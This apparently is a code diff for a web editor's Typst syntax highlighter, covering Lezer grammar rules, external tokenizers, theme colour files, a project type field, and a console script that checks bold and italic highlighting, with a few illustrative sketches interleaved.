if (input.peek(-1) !== NEWLINE) return
let back = -2
while (
(input.peek(back) >= 65 && input.peek(back) <= 90) ||
(input.peek(back) >= 97 && input.peek(back) <= 122) ||
(input.peek(back) >= 48 && input.peek(back) <= 57)
) { back-- }
if (input.peek(back) !== BACKTICK ||
input.peek(back - 1) !== BACKTICK ||
input.peek(back - 2) !== BACKTICK) return
let hasContent = false
while (input.next !== -1) {
if (
@@ -189,6 +136,36 @@ export const rawInlineTokenizer = new ExternalTokenizer(
{ contextual: false }
)
// ── codeBlockTokenizer ──────────────────────────────────────────────────
// Emits CodeBlockBody — the interior of a #{ ... } code block.
// Tracks brace nesting depth so that inner braces (e.g. #{ f({ x }) })
// are included in the body rather than closing the outer block.
export const codeBlockTokenizer = new ExternalTokenizer(
(input, _stack) => {
// The opening '{' has already been consumed by the grammar rule.
let depth = 1
let hasContent = false
while (input.next !== -1) {
const ch = input.next
if (ch === OPEN_BRACE) {
depth++
input.advance()
hasContent = true
} else if (ch === CLOSE_BRACE) {
if (depth === 1) break // leave this '}' for the grammar rule
depth--
input.advance()
hasContent = true
} else {
input.advance()
hasContent = true
}
}
if (hasContent) input.acceptToken(CodeBlockBody)
},
{ contextual: false }
)
// ── blockCommentTokenizer ───────────────────────────────────────────────
// Emits BlockCommentBody — the interior of a /* ... */ comment.
// Typst supports nested block comments (/* /* inner */ outer */), so this
@@ -238,13 +215,9 @@ export const lineCommentContentTokenizer = new ExternalTokenizer(
)
// ── mathContentTokenizer ────────────────────────────────────────────────
// Emits MathContent — one line of content between the $...$ delimiters.
// Stops at '$' or '\n' so each token is bounded to a single line.
//
// The grammar uses MathContent* (not MathContent?) so multi-line display
// math ($ ... \n ... $) is handled by multiple MathContent tokens, one per
// line, with @skip consuming the newlines in between. This keeps each
// token short and prevents a stray '$' from consuming the whole document.
// Emits MathContent — everything between the $...$ delimiters (no newlines).
// External rather than a @tokens rule for the same reason as LineCommentContent:
// ![$\n]+ overlaps with spaces, '<', '@', and other literals in merged states.
export const mathContentTokenizer = new ExternalTokenizer(
(input, _stack) => {
let hasContent = false
@@ -256,174 +229,3 @@ export const mathContentTokenizer = new ExternalTokenizer(
},
{ contextual: false }
)
// ── codeKeywordTokenizer ─────────────────────────────────────────────────
// Emits CodeKeyword (let, set, for, while, in, …) ONLY when the nearest
// preceding non-whitespace character is '#', ':', '{', or ';', i.e. right
// after the '#' sigil of a CodeExpr, after a keyword-body ':', at the start
// of a code block, or after a statement separator.
//
// This backward-scan guard is what prevents LALR state-merging from causing
// these tokens to fire in body-text positions. Common English words like
// "in", "for", "while", "return" appear in markup paragraphs; without the
// guard they would be highlighted as keywords due to LALR-merged states where
// CodeKeyword is technically in the valid set.
export const codeKeywordTokenizer = new ExternalTokenizer(
(input, stack) => {
if (!stack.canShift(CodeKeyword)) return
// Valid positions: after '#', ':', '{' (code block start), or ';'.
// Walk back past optional whitespace.
let back = -1
while (input.peek(back) === SPACE || input.peek(back) === TAB || input.peek(back) === NEWLINE) back--
const kwPrev = input.peek(back)
if (kwPrev !== HASH && kwPrev !== COLON && kwPrev !== OPEN_BRACE && kwPrev !== SEMICOLON) return
// Peek ahead to read the full identifier without advancing.
let len = 0
while (true) {
const ch = input.peek(len)
if (isIdentHead(ch) || (len > 0 && isIdentTail(ch))) { len++ } else { break }
}
if (len === 0) return
const chars = []
for (let i = 0; i < len; i++) chars.push(input.peek(i))
const word = String.fromCharCode(...chars)
if (!KEYWORDS.has(word)) return
for (let i = 0; i < len; i++) input.advance()
input.acceptToken(CodeKeyword)
},
{ contextual: true }
)
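// Illustration only (not part of the diff): a sketch of the backward-scan
// guard on a plain string. keywordAllowedAt and KEYWORD_PREV are hypothetical
// names; the real tokenizer additionally checks stack.canShift(CodeKeyword)
// and the KEYWORDS set, which this sketch leaves out.

```javascript
const KEYWORD_PREV = new Set(['#', ':', '{', ';'])

// True when the nearest non-whitespace character before `pos` is one of
// '#', ':', '{' or ';'. Returns false at the very start of the text.
function keywordAllowedAt(text, pos) {
  let back = pos - 1
  while (back >= 0 && (text[back] === ' ' || text[back] === '\t' || text[back] === '\n')) back--
  return back >= 0 && KEYWORD_PREV.has(text[back])
}

console.log(keywordAllowedAt('#let x = 1', 1))            // "let" right after '#'
console.log(keywordAllowedAt('walk in the park', 5))      // "in" inside a paragraph
console.log(keywordAllowedAt('#show strong: set text', 14)) // "set" after ':'
```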
// ── codeIdentTokenizer ───────────────────────────────────────────────────
// Emits CodeIdent — identifier tokens inside code expressions (#ident,
// #func(args), #obj.method, etc.).
//
// Moving CodeIdent from @tokens to an external tokenizer allows a
// character-level guard: positions where the preceding non-whitespace
// character is one of '#', '.', '(', ',', '=', ':', '+' are treated as
// genuine code context; anywhere else the tokenizer falls back to
// canShift(CodeIdent). The intent is to stop the token from firing in markup
// body text, where LALR-merged states would otherwise cause '_italic_' to be
// consumed as one big CodeIdent (since '_' is a valid identHead) instead of
// opening Emphasis.
//
// Keywords and bools are excluded so codeKeywordTokenizer / CodeBool can
// handle them without conflict.
//
// The backward scan runs BEFORE any canShift gate. canShift(CodeArgKey) is
// unreliable (LALR state merging can suppress it even at genuine arg-key
// positions, e.g. 'caption:' after a complex nested call like 'table(...)').
// We derive couldBeArgKey from character-level evidence ('(' or ',') and use
// that to decide whether to continue even when canShift(CodeIdent) is false.
export const codeIdentTokenizer = new ExternalTokenizer(
(input, stack) => {
const couldBeIdent = stack.canShift(CodeIdent)
// Walk back past whitespace — primary context discriminator.
let back = -1
while (input.peek(back) === SPACE || input.peek(back) === TAB || input.peek(back) === NEWLINE) back--
const prev = input.peek(back)
if (prev !== HASH && prev !== DOT && prev !== OPEN_PAREN && prev !== COMMA && prev !== EQUALS && prev !== COLON && prev !== PLUS) {
if (!isIdentTail(prev)) {
// prev is a structural delimiter (e.g. ')' after a function call, '{' at
// block start, '}' after a nested block). These are valid statement-start
// positions inside a CodeBlock's codeStatement* list. Trust canShift —
// it's reliable in the grammar-parsed code-block states.
if (!couldBeIdent) return
} else {
// prev looks like the tail of a preceding word — scan back to find '#' or ':'.
// Accepting ':' lets multi-word chains like 'show sel: set text' work.
let b = back
while (isIdentTail(input.peek(b))) b--
while (input.peek(b) === SPACE || input.peek(b) === TAB || input.peek(b) === NEWLINE) b--
const chainEnd = input.peek(b)
if (chainEnd !== HASH && chainEnd !== COLON) {
// Could be second+ statement in a code block (e.g. after 'let x = 1').
if (!couldBeIdent) return
}
}
}
// In arg-delimiter positions ('(' or ',') we may emit CodeArgKey regardless
// of canShift(CodeIdent) — LALR merging can suppress canShift(CodeIdent)
// after a complex first argument (e.g. figure(table(...), caption: ...)).
// ':' and '=' are value positions, NOT arg-key positions.
const couldBeArgKey = prev === OPEN_PAREN || prev === COMMA
if (!couldBeIdent && !couldBeArgKey) return
// Must start with an identifier head character.
if (!isIdentHead(input.next)) return
// Peek ahead to read the full identifier.
let len = 0
while (true) {
const ch = input.peek(len)
if (len === 0 ? isIdentHead(ch) : isIdentTail(ch)) { len++ } else { break }
}
if (len === 0) return
const chars = []
for (let i = 0; i < len; i++) chars.push(input.peek(i))
const word = String.fromCharCode(...chars)
// Let codeKeywordTokenizer handle keywords; let CodeBool handle bools.
if (KEYWORDS.has(word) || BOOLS.has(word)) return
// Emit CodeArgKey when this identifier is immediately followed by ':'.
// Only applies in arg-delimiter positions (couldBeArgKey).
let isArgKey = false
if (couldBeArgKey) {
let afterLen = len
while (input.peek(afterLen) === SPACE || input.peek(afterLen) === TAB) afterLen++
isArgKey = (input.peek(afterLen) === COLON)
}
for (let i = 0; i < len; i++) input.advance()
if (isArgKey) {
input.acceptToken(CodeArgKey)
} else if (couldBeIdent) {
input.acceptToken(CodeIdent)
}
},
{ contextual: true }
)
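// Illustration only (not part of the diff): a sketch of the CodeArgKey
// decision on a plain string. classifyIdent is a hypothetical helper, and the
// two character-class predicates are assumed to follow the
// [A-Za-z_][A-Za-z0-9_-]* shape of the grammar's identifier rule. The
// canShift gate and the keyword/bool exclusion are deliberately omitted.

```javascript
const isIdentHead = ch => /[A-Za-z_]/.test(ch)
const isIdentTail = ch => /[A-Za-z0-9_-]/.test(ch)

// Classifies the identifier starting at `pos`, given the nearest preceding
// non-whitespace character `prev`. Returns 'CodeArgKey', 'CodeIdent', or
// null when no identifier starts at `pos`.
function classifyIdent(text, pos, prev) {
  let len = 0
  while (pos + len < text.length) {
    const ch = text[pos + len]
    if (len === 0 ? isIdentHead(ch) : isIdentTail(ch)) len++
    else break
  }
  if (len === 0) return null
  // Only '(' and ',' are arg-delimiter positions; ':' and '=' are value positions.
  const couldBeArgKey = prev === '(' || prev === ','
  if (!couldBeArgKey) return 'CodeIdent'
  // Skip horizontal whitespace, then look for the ':' that marks a named arg.
  let after = pos + len
  while (text[after] === ' ' || text[after] === '\t') after++
  return text[after] === ':' ? 'CodeArgKey' : 'CodeIdent'
}

const call = 'figure(table(), caption: [x])'
console.log(classifyIdent(call, 7, '('))  // "table" is followed by '('
console.log(classifyIdent(call, 16, ',')) // "caption" is followed by ':'
```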
// ── strongBodyTokenizer ──────────────────────────────────────────────────
// Emits StrongBody — the content between the '*' delimiters of a Strong node.
//
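// Lezer only runs this tokenizer in states where StrongBody is a valid token,
// i.e. inside Strong → "*" . StrongBody? "*". That state is very specific and
// is not merged with item* by Lezer's aggressive LALR merging, so no explicit
// stack.canShift check is needed here. contextual: true marks the result as
// dependent on the parse stack, so it is not cached between parse contexts.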
//
// Reads everything up to the first '*' or newline (Typst bold does not span
// lines). A trailing '*' that is the closing delimiter is left for the
// grammar rule to consume.
export const strongBodyTokenizer = new ExternalTokenizer(
(input, _stack) => {
let hasContent = false
while (input.next !== -1 && input.next !== STAR && input.next !== NEWLINE) {
input.advance()
hasContent = true
}
if (hasContent) input.acceptToken(StrongBody)
},
{ contextual: true }
)
// ── emphBodyTokenizer ────────────────────────────────────────────────────
// Emits EmphBody — the content between the '_' delimiters of an Emphasis node.
// Same design as strongBodyTokenizer; stops at '_' or newline.
export const emphBodyTokenizer = new ExternalTokenizer(
(input, _stack) => {
let hasContent = false
while (input.next !== -1 && input.next !== UNDERSCORE && input.next !== NEWLINE) {
input.advance()
hasContent = true
}
if (hasContent) input.acceptToken(EmphBody)
},
{ contextual: true }
)
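// Illustration only (not part of the diff): the read-to-delimiter loop shared
// by strongBodyTokenizer and emphBodyTokenizer, sketched on a plain string.
// readBody is a hypothetical helper name.

```javascript
// Returns the body text starting at `start`, stopping before `delim`, a
// newline, or end of input. Returns null when the body is empty, which
// mirrors the tokenizer emitting no token in that case.
function readBody(text, start, delim) {
  let pos = start
  while (pos < text.length && text[pos] !== delim && text[pos] !== '\n') pos++
  return pos > start ? text.slice(start, pos) : null
}

console.log(readBody('*bold* rest', 1, '*'))  // body of a Strong node
console.log(readBody('_a\nb_', 1, '_'))       // stops at the newline
console.log(readBody('**', 1, '*'))           // empty body, no token
```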
@@ -5,10 +5,8 @@
// headingTitleTokenizer — HeadingTitle: the title text to end of line
// rawTokenizer — triple-backtick raw block open/body/close
// rawInlineTokenizer — single-backtick raw inline content
// codeBlockTokenizer — brace-depth tracking inside #{ ... }
// blockCommentTokenizer — depth-tracked nested /* ... */ comments
// codeIdentTokenizer — CodeIdent: identifier, only fires in code context
// strongBodyTokenizer — StrongBody: content inside *...*
// emphBodyTokenizer — EmphBody: content inside _..._
@top Document { item* }
@@ -26,9 +24,8 @@ item {
Label |
Ref |
Escape |
URL |
MarkupContent |
ClosingSquare
Newline |
MarkupContent
}
// ── Headings ──────────────────────────────────────────────────────────────
@@ -61,140 +58,63 @@ RawInline { "`" RawInlineContent? "`" }
// #[ ... ] — content block (re-parses as markup items)
CodeExpr { "#" codeExprBody }
// codeExprBody: forms valid after '#' in markup, or after ':' / '=' in a
// keyword-body. FuncExpr handles ident+callSuffix(s); bare CodeIdent handles
// a plain variable reference (#x). No CallExpr with callSuffix* here — that
// *-quantifier makes both shift and reduce carry !call precedence (a tie that
// @right cannot resolve reliably once codeStatement* state-merging is in play).
codeExprBody {
KeywordExpr |
AtomExpr |
FuncExpr |
CodeIdent |
CallExpr |
CodeBlock |
ContentBlock
}
// callOrValue covers the subject of a keyword expression (#set text, #show link,
// #import "pkg", #let name). keywordBody is exclusive: ':' for show-rule bodies
// and '=' for let-binding values (a keyword expression never has both).
// Two precedences:
// call @right — prefer extending callSuffixes (FuncExpr) over completing the
// FuncExpr and letting '(' start a new statement. The `!call` marker
// encodes the shift as (call << 2) and the FuncExpr reduce as
// (call << 2) - 1 (due to @right); shift > reduce, so callSuffix
// chains are greedily extended. Without @right both actions have
// the same numeric precedence and the conflict is unresolved.
// kw — prefer CodeKeyword !kw callOrValueAndBody over CodeKeyword keywordBody?
// when an identifier follows the keyword. shift = kw << 2, reduce
// (second alternative) = 0; kw > 0, no @right needed.
// add — resolves the shift/reduce conflict when a '+' follows a codeArgValue:
// SHIFT '+' (extend codeArgValue → codeArgValue !add "+" codeValue): prec add
// REDUCE codeArgItem → codeArgValue (complete arg): prec 0
// add > 0 → shift wins, so 0.8pt + brand stays as one arg value.
@precedence { call @right, kw, add }
// KeywordExpr: used in markup-level code (#show, #let, #set …) AND nested
// inside codeExprBody (e.g. the RHS after ':' in a show-rule).
// Same two-alternative structure as codeStatement: the !kw on the first
// alternative gives the shift prec kw > 0 over the unannotated reduce of the
// second alternative (prec 0). This avoids the call-vs-call tie that arises
// from the old `callOrValue?` optional pattern.
KeywordExpr {
CodeKeyword !kw callOrValueAndBody |
CodeKeyword keywordBody?
}
// callOrValue: FuncExpr for "ident(args)" / "ident.method", bare CodeIdent for
// a plain name, CodeString for string subjects like #import "pkg".
// FuncExpr requires at least one callSuffix, so at [CodeIdent ·] seeing '(':
// SHIFT (start callSuffixes, prec call) vs REDUCE bare CodeIdent (prec 0).
// call > 0 → shift wins cleanly.
callOrValue { FuncExpr | CodeIdent | CodeString }
keywordBody { ":" codeExprBody | "=" codeValue }
// CallExpr? covers '#set text(size: 12pt)', '#show heading: ...', etc.
// The optional CallExpr is only shifted when the next token is CodeIdent,
// so there is no shift/reduce conflict with other items that follow keywords.
KeywordExpr { CodeKeyword CallExpr? }
AtomExpr { CodeBool }
// codeStatement is the unit inside a CodeBlock's brace body.
// Two explicit alternatives for the keyword case avoid the LALR ambiguity
// that arises from codeStatement* merging when callOrValue? is optional.
// The !kw annotation on the first alternative (shift callOrValueAndBody) has
// higher precedence than the bare reduce of the second alternative (prec 0),
// so 'show strong: …' grabs 'strong' as callOrValue rather than completing
// KeywordExpr early with empty callOrValue.
codeStatement {
CodeKeyword !kw callOrValueAndBody |
CodeKeyword keywordBody? |
codeValue |
";"
}
callOrValueAndBody { callOrValue keywordBody? }
// FuncExpr: identifier followed by one-or-more call suffixes.
// callSuffixes uses explicit left-recursion (not +) so the !call annotation
// on the recursive extension point gives the shift prec call vs the unannotated
// reduce of codeValue → FuncExpr (prec 0) — shift wins, no @right tie.
callSuffixes { callSuffix | callSuffixes !call callSuffix }
FuncExpr { CodeIdent !call callSuffixes }
CallExpr { CodeIdent callSuffix* }
callSuffix {
CodeArgs |
"." CodeIdent |
ContentBlock
"." CodeIdent
}
CodeArgs { "(" codeArgList? ")" }
codeArgList { codeArgItem ("," codeArgItem)* ","? }
codeArgItem {
CodeArgKey ":" codeArgValue |
codeArgValue
CodeIdent ":" codeValue |
codeValue
}
// codeArgValue extends codeValue with '+' chaining for expressions like
// `stroke: 0.8pt + brand` or `fill: base + overlay`.
// Left-recursive rule: LALR state for codeArgValue · seeing '+':
// SHIFT '+' (extend, !add prec): prec add > 0
// REDUCE codeArgItem → codeArgValue (complete): prec 0
// add > 0 → shift wins cleanly. No @right needed (strict dominance).
// Only used inside CodeArgs, so codeStatement* LALR-merging does not apply.
codeArgValue { codeValue | codeArgValue !add "+" codeValue }
codeValue {
CodeString |
CodeNumber |
CodeBool |
FuncExpr |
CodeIdent |
CallExpr |
ContentBlock |
CodeBlock |
InlineMath |
CodeArray
InlineMath
}
// Typst array / tuple / dictionary literal: (a, b) or (key: val, …)
// Reuses codeArgList so named-key entries like (auto, 1fr) work too.
CodeArray { "(" codeArgList? ")" }
// CodeBlock parses its content as a codeStatement* list so that keywords
// (show, let, set…) and identifiers inside braces receive proper highlighting.
CodeBlock { "{" codeStatement* "}" }
// CodeBlockBody depth-tracks braces so #{ let x = { 1 } } parses correctly.
CodeBlock { "{" CodeBlockBody? "}" }
// ContentBlock re-enters markup mode, allowing #[*bold* text].
ContentBlock { "[" item* "]" }
// ── Math ──────────────────────────────────────────────────────────────────
// Both inline ($x^2$) and display ($ x^2 $) math use the same node type.
// MathContent* (not ?) allows multi-line display math: each line becomes one
// MathContent token (stopping at '\n'), and @skip consumes the newlines between.
InlineMath { "$" MathContent* "$" }
InlineMath { "$" MathContent? "$" }
// ── Markup formatting ─────────────────────────────────────────────────────
// Strong and Emphasis use flat external body tokens (StrongBody / EmphBody)
// rather than recursive strongItem* / emphItem* loops. The loop approach
// triggered LALR state merging that caused item*-level tokens (MarkupContent,
// CodeIdent) to win over StrongText/EmphText inside the construct, so the
// body nodes were never produced. The flat external tokens are only valid
// inside Strong/Emphasis (their tokenizers are marked contextual) and
// reliably avoid those merged states.
Strong { "*" StrongBody? "*" }
Emphasis { "_" EmphBody? "_" }
// Cross-nesting of Strong/Emphasis is intentionally excluded to avoid a
// mutual-recursion cycle (Strong→Emphasis→Strong) that causes state explosion
// in the Lezer LR automaton builder. StrongText includes '_' and EmphText
// includes '*', so the nested delimiters are treated as plain text inside the
// opposite construct rather than producing error nodes.
Strong { "*" strongItem* "*" }
strongItem { CodeExpr | InlineMath | RawInline | Label | Ref | StrongText }
Emphasis { "_" emphItem* "_" }
emphItem { CodeExpr | InlineMath | RawInline | Label | Ref | EmphText }
// ── Labels and references ─────────────────────────────────────────────────
Label { "<" LabelName ">" }
@@ -222,6 +142,10 @@ Escape { "\\" EscapeChar }
RawInlineContent
}
@external tokens codeBlockTokenizer from "./tokens.mjs" {
CodeBlockBody
}
@external tokens blockCommentTokenizer from "./tokens.mjs" {
BlockCommentBody
}
@@ -234,44 +158,30 @@ Escape { "\\" EscapeChar }
MathContent
}
@external tokens codeKeywordTokenizer from "./tokens.mjs" {
CodeKeyword
}
// CodeIdent is external so codeIdentTokenizer can apply a character-level
// guard: it inspects the preceding non-whitespace character ('#', '.', '(',
// ',', '=', ':' or '+' mark a code expression) before emitting. The intent
// is to stop the token from firing in markup body text, where LALR state
// merging would otherwise cause the entire token (including any leading '_')
// to be consumed as a code identifier instead of letting '_' open an Emphasis.
// CodeArgKey is emitted by the same tokenizer when an identifier is immediately
// followed by ':' — the tokenizer pre-disambiguates named arg keys so the LALR
// parser does not need to choose between codeArgItem alternatives on lookahead.
@external tokens codeIdentTokenizer from "./tokens.mjs" {
CodeIdent,
CodeArgKey
}
@external tokens strongBodyTokenizer from "./tokens.mjs" {
StrongBody
}
@external tokens emphBodyTokenizer from "./tokens.mjs" {
EmphBody
}
// ── Regular tokens ────────────────────────────────────────────────────────
@tokens {
// All whitespace including newlines. Heading detection still works because
// headingTokenizer uses input.peek(-1) on the raw character stream — it sees
// the '\n' byte regardless of what @skip consumes at the token level.
// Including '\n' here lets multi-line code expressions (e.g. #figure(\n ...\n))
// parse without error instead of triggering Lezer error recovery.
spaces { $[ \t\n\r]+ }
// Horizontal whitespace only. Newlines are kept as explicit Newline items
// so that HeadingMark (which checks start-of-line via input.peek(-1)) can
// reliably detect newlines in the raw input stream.
spaces { $[ \t]+ }
// Keywords take precedence over identifiers when they match fully
// (e.g. "let" → CodeKeyword, "letter" → CodeIdent).
CodeKeyword {
"let" | "set" | "show" | "import" | "include" |
"if" | "else" | "for" | "while" | "return" |
"break" | "continue" | "in" | "as" |
"and" | "or" | "not" | "context"
}
// Boolean / null literals — distinct from keywords for highlighting.
CodeBool { "true" | "false" | "none" | "auto" }
// General identifier: [A-Za-z_][A-Za-z0-9_-]*
CodeIdent { identHead identTail* }
identHead { @asciiLetter | "_" }
identTail { @asciiLetter | @digit | "_" | "-" }
// Double-quoted string with backslash escapes (no single-quoted strings in Typst).
CodeString { '"' (!["\\\n] | "\\" _)* '"' }
@@ -281,42 +191,41 @@ Escape { "\\" EscapeChar }
("pt" | "mm" | "cm" | "in" | "em" | "rem" | "fr" | "deg" | "rad" | "%")?
}
// URL: bare https:// or http:// links in markup text. Matched as a single
// token so '://' is never split into ':' + LineComment '//…'. Stops at
// whitespace and angle brackets (labels use '<…>').
URL { ("https" | "http") "://" (![ \t\n<>])* }
// Text tokens for markup contexts; each excludes its own delimiters.
// HeadingText, LineCommentContent, and MathContent are external tokens
// (see above) — broad "read-to-delimiter" tokens that would otherwise
// conflict with every other literal token in LALR-merged states.
// '<' is excluded from StrongText/EmphText so that Label ('<' LabelName '>')
// is recognised inside strong/emphasis rather than consumed as plain text.
StrongText { ![\n*$#`<@\\]+ }
EmphText { ![\n_$#`<@\\]+ }
// Regular markup: excludes all special-character starters plus whitespace
// (whitespace is handled by @skip). The '/' is excluded so that '//' and
// '/*' are not accidentally consumed as plain text. ']' is excluded so
// that ContentBlock { "[" item* "]" } can always close reliably — a bare
// ']' in body text is matched as ClosingSquare instead.
MarkupContent { ![\n \t\]=*_$#/<@`\\]+ }
// Fallback for a bare ']' in markup text (outside any ContentBlock).
// Inside ContentBlock the literal "]" terminal wins via @precedence.
ClosingSquare { "]" }
// '/*' are not accidentally consumed as plain text.
MarkupContent { ![\n \t=*_$#/<@`\\]+ }
// Label names: identifiers with optional dots/colons (e.g. <sec:intro>).
LabelName { (@asciiLetter | "_" | @digit) (@asciiLetter | @digit | "_" | "-" | "." | ":")* }
RefName { (@asciiLetter | "_") (@asciiLetter | @digit | "_" | "-")* }
LabelName { (identHead | @digit) (identTail | "." | ":")* }
RefName { identHead identTail* }
// Escape: any single character after backslash.
EscapeChar { _ }
// Resolve ambiguities in merged states:
// EscapeChar > spaces: after '\', EscapeChar must win over the skip token.
// "(" > "." > "]": callSuffix delimiters must win over MarkupContent after
// a code identifier (merged states expose these to the markup tokenizer).
// "_" > MarkupContent: '_' must open Emphasis rather than being swallowed
// by MarkupContent (redundant since '_' is in MarkupContent's exclusion
// set, but kept for clarity).
// CodeIdent and StrongText/EmphText are now external tokens — not listed.
// "[" > MarkupContent: ContentBlock callSuffix wins in merged code/markup states.
// CodeString > MarkupContent: '"' starts a string literal after a keyword.
// ":" > MarkupContent: keywordBody ':' wins over markup colon in code states.
// URL > MarkupContent: 'https://' / 'http://' wins over plain markup text.
@precedence { CodeBool EscapeChar CodeString URL "[" ":" "(" "." "+" "]" ClosingSquare "_" spaces MarkupContent }
// Newline item — kept out of @skip so heading detection works.
Newline { "\n" }
// Resolve ambiguities: more-specific tokens win over broader catch-alls.
// EscapeChar > spaces: after '\', EscapeChar must win over the skip token
// (both match \t; without this, '\t' would be mis-tokenized).
// "(" > "." > "]" > text tokens: after '#' CodeIdent, callSuffix delimiters
// must win over MarkupContent/StrongText/EmphText in merged states.
// LineCommentContent and MathContent are external tokens — not listed here.
// "_" added after CodeIdent: KeywordExpr { CodeKeyword CallExpr? } merges
// the post-keyword state with markup states where "_" starts Emphasis.
// CodeIdent wins so '#set _name(...)' is tokenised correctly; in pure markup
// states CodeIdent is not in the valid set so "_" still opens Emphasis.
@precedence { CodeKeyword CodeBool CodeIdent EscapeChar "(" "." "]" "_" spaces MarkupContent StrongText EmphText }
}
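// Illustration only (not part of the diff): a JavaScript regex that is
// assumed to be equivalent to the URL token in the @tokens block above,
// ("https" | "http") "://" followed by any run of characters other than
// space, tab, newline, '<' and '>'. URL_TOKEN and matchUrl are hypothetical
// names.

```javascript
const URL_TOKEN = /^https?:\/\/[^ \t\n<>]*/

// Returns the URL text starting at `pos`, or null if no URL starts there.
function matchUrl(text, pos) {
  const m = URL_TOKEN.exec(text.slice(pos))
  return m ? m[0] : null
}

console.log(matchUrl('see https://typst.app/docs <ref>', 4))
console.log(matchUrl('ftp://example.org', 0))
```

// Because the whole 'https://…' run is one match, the '//' inside it never
// gets a chance to start a line comment.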
@skip { spaces }
File diff suppressed because one or more lines are too long
@@ -1,45 +0,0 @@
// This file was generated by lezer-generator. You probably shouldn't edit it.
export const
HeadingMark = 1,
HeadingTitle = 2,
RawBlockOpen = 3,
RawBlockBody = 4,
RawBlockClose = 5,
RawInlineContent = 6,
BlockCommentBody = 7,
LineCommentContent = 8,
MathContent = 9,
CodeKeyword = 10,
CodeIdent = 11,
CodeArgKey = 12,
StrongBody = 13,
EmphBody = 14,
Document = 15,
Heading = 16,
LineComment = 17,
BlockComment = 18,
RawBlock = 19,
RawInline = 20,
CodeExpr = 21,
KeywordExpr = 22,
FuncExpr = 23,
CodeArgs = 24,
CodeString = 25,
CodeNumber = 26,
CodeBool = 27,
ContentBlock = 28,
CodeBlock = 29,
InlineMath = 30,
CodeArray = 31,
AtomExpr = 32,
Strong = 33,
Emphasis = 34,
Label = 35,
LabelName = 36,
Ref = 37,
RefName = 38,
Escape = 39,
EscapeChar = 40,
URL = 41,
MarkupContent = 42,
ClosingSquare = 43
@@ -73,10 +73,7 @@
},
".tok-variableName": {
"color": "#9b859d"
},
".tok-attributeName": {
"color": "#F4BF75"
}
},
"dark": true
}
}
@@ -74,10 +74,7 @@
},
".tok-variableName": {
"color": "#FF80E1"
},
".tok-attributeName": {
"color": "#FFD700"
}
},
"dark": true
}
}
@@ -56,10 +56,7 @@
},
".tok-attributeValue": {
"color": "rgb(0, 64, 128)"
},
".tok-attributeName": {
"color": "#994409"
}
},
"dark": false
}
}
@@ -67,10 +67,7 @@
},
".tok-attributeValue": {
"color": "#234A97"
},
".tok-attributeName": {
"color": "#7B3814"
}
},
"dark": false
}
}
@@ -69,10 +69,7 @@
},
".tok-list": {
"color": "rgb(185, 6, 144)"
},
".tok-attributeName": {
"color": "#994409"
}
},
"dark": false
}
}
@@ -53,10 +53,7 @@
".tok-regexp": {
"color": "#009926",
"fontWeight": "normal"
},
".tok-attributeName": {
"color": "#735C0F"
}
},
"dark": false
}
}
@@ -71,10 +71,7 @@
".tok-comment": {
"fontStyle": "italic",
"color": "#00E060"
},
".tok-attributeName": {
"color": "#F4BF75"
}
},
"dark": true
}
}
@@ -55,10 +55,7 @@
},
".tok-operator": {
"color": "#EBDAB4"
},
".tok-attributeName": {
"color": "#FABD2F"
}
},
"dark": true
}
}
@@ -61,10 +61,7 @@
".tok-comment": {
"fontStyle": "italic",
"color": "#BC9458"
},
".tok-attributeName": {
"color": "#DA4939"
}
},
"dark": true
}
}
@@ -70,10 +70,7 @@
},
".tok-variableName": {
"color": "#FF80E1"
},
".tok-attributeName": {
"color": "#d4c96e"
}
},
"dark": true
}
}
@@ -64,10 +64,7 @@
},
".tok-list": {
"color": "#8F5B26"
},
".tok-attributeName": {
"color": "#994409"
}
},
"dark": false
}
}
@@ -57,10 +57,7 @@
},
".tok-number": {
"color": "#5A5CAD"
},
".tok-attributeName": {
"color": "#7B3F00"
}
},
"dark": false
}
}
@@ -66,10 +66,7 @@
},
".tok-variableName": {
"color": "#C1C144"
},
".tok-attributeName": {
"color": "#ACA0DC"
}
},
"dark": true
}
}
@@ -72,10 +72,7 @@
},
".tok-list": {
"color": "rgb(185, 6, 144)"
},
".tok-attributeName": {
"color": "#994409"
}
},
"dark": false
}
}
@@ -69,10 +69,7 @@
},
".tok-attributeValue": {
"color": "#7587A6"
},
".tok-attributeName": {
"color": "#CF6A4C"
}
},
"dark": true
}
}
@@ -407,19 +407,15 @@ ul.project-list-filters {
white-space: nowrap;
&.project-format-badge-quarto {
background-color: #447099; // Quarto blue (PDF output)
}
&.project-format-badge-quarto-slides {
background-color: #e4637c; // RevealJS pink-red
background-color: #447099;
}
&.project-format-badge-typst {
background-color: #239dad; // typst.app brand blue
background-color: #ee6331;
}
&.project-format-badge-latex {
background-color: #098842; // Overleaf brand green
background-color: #72994e;
}
}
@@ -53,7 +53,6 @@ export type ProjectApi = {
accessLevel: ProjectAccessLevel
source: Source
compiler?: ProjectCompiler
quartoFlavor?: 'revealjs' | 'pdf'
}
export type Project = MergeAndOverride<
@@ -0,0 +1,52 @@
// Typst bold/italic parse-tree diagnostic
// Open a Typst document that contains *bold* and _italic_ text,
// then paste this whole block into the browser console.
(function () {
const strong = [...document.querySelectorAll('.tok-strong')]
const emphasis = [...document.querySelectorAll('.tok-emphasis')]
console.group('=== Typst bold/italic diagnostic ===')
console.log('tok-strong count :', strong.length)
console.log('tok-emphasis count:', emphasis.length)
if (strong.length) {
console.log('tok-strong text :', strong.map(s => JSON.stringify(s.textContent)))
}
if (emphasis.length) {
console.log('tok-emphasis text :', emphasis.map(s => JSON.stringify(s.textContent)))
}
// Interpret results
if (strong.length === 0 && emphasis.length === 0) {
console.warn(
'RESULT: Grammar is NOT producing Strong/Emphasis nodes.',
'This is a LALR state-merge bug — needs a grammar fix.'
)
} else {
const strongText = strong.map(s => s.textContent).join('')
const emphText = emphasis.map(s => s.textContent).join('')
const hasMidStrong = strong.length > 2 // more than just the two * delimiters
const hasMidEmph = emphasis.length > 2
if (hasMidStrong || hasMidEmph) {
console.info(
'RESULT: Grammar IS producing Strong/Emphasis nodes (content inside delimiters is styled).',
'Bold/italic not visible? Issue is the loaded font — Source Code Pro only has Regular (400).',
'Fix: switch editor font to DM Mono (which has actual Italic + Medium faces).',
'Or: load Source Code Pro Bold/Italic font files.'
)
} else {
console.warn(
'RESULT: Partial — only the delimiters (* or _) are styled, not the text between them.',
'StrongText/EmphText nodes are missing. Needs a grammar fix.'
)
}
console.log('all strong text joined :', JSON.stringify(strongText))
console.log('all emphasis text joined:', JSON.stringify(emphText))
}
console.groupEnd()
})()
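// Illustration only (not part of the diff): the branch logic of the
// diagnostic above, factored into a pure function so it can be exercised
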